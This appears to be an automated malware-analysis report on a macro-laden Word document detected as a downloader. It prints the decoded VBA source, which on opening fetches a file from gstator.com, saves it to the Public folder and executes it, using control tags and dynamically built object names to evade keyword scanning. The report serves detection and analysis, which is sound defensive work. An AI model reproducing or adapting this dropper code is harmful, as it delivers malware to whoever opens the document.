Office (OOXML) malware analysis — malicious · 027089cbde69093a

MALICIOUS

Office (OOXML)

139.8 KB Created: 2021-02-07 17:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-18

MD5: c7c2d06ed95c4b049e7b3208b48e575b SHA-1: 202f8c42bf7b2e5b379e71073e3230331cf64308 SHA-256: 027089cbde69093a8f4dd4376bdc2bd9fd7349043dac3a77e8080c8b78b02e22

290 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.BlueWord-9845926-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.BlueWord-9845926-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
      f = IndexStoragePointer.ResponseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
      Set IndexStoragePointer = CreateObject(ConvertArray)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2226 bytes
SHA-256: `cb6597afef5471ed4b2e857d8e3fa103189a7b6d51ddc96921c0ab2506491164`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() InstrumentationUtil.CheckBox1_Click End Sub Attribute VB_Name = "InstrumentationUtil" Attribute VB_Base = "0{31B5A3BE-563C-4C3D-88C7-54B80B459D94}{1295C44D-A57E-4718-983C-95D5F92DF3EB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public w32LoadConvert Public RefConst Public ExceptionPasteRemove Public Sub CheckBox1_Click() ListBox1.AddItem (CommandButton1.Tag) ListBox1.AddItem (CheckBox1.Tag) CommandButton1_Click ListBox1_Click End Sub Private Sub CommandButton1_Click() ListBox1.AddItem (Image1.ControlTipText) ListBox1.AddItem ("://gstator.com/header.jpg") End Sub Private Sub ListBox1_Click() InstrumentationUtil.w32LoadConvert = "C:\users\Public\" + "rzw.jpg" InstrumentationUtil.RefConst = "http" InstrumentationUtil.ExceptionPasteRemove = "GET" ViewBufListbox = 1 Dim IndexStoragePointer As Object Dim GlobalScreen As Object For Each ConvertArray In ListBox1.List If ViewBufListbox = Len("Z") Then Set IndexStoragePointer = CreateObject(ConvertArray) IndexStoragePointer.Open InstrumentationUtil.ExceptionPasteRemove, InstrumentationUtil.RefConst & ListBox1.List(3), False IndexStoragePointer.Send End If If ViewBufListbox = Len("ZZ") Then Set GlobalScreen = CreateObject(ConvertArray & "am") GlobalScreen.Open GlobalScreen.Type = Len("Z") f = IndexStoragePointer.ResponseBody GlobalScreen.Write f GlobalScreen.SaveToFile InstrumentationUtil.w32LoadConvert, 2 End If If ViewBufListbox = Len("ZZZ") Then Shell% (ConvertArray + " " & InstrumentationUtil.w32LoadConvert) End If ViewBufListbox = ViewBufListbox + 1 Next End Sub Private Sub skuid_Change() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	99328 bytes
SHA-256: `b9a1ebc60de52dae0e3ae6837af7c8c69a1facd8b9c49d067632bb0bf143acf1`
Detection ClamAV: Doc.Downloader.BlueWord-9845926-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.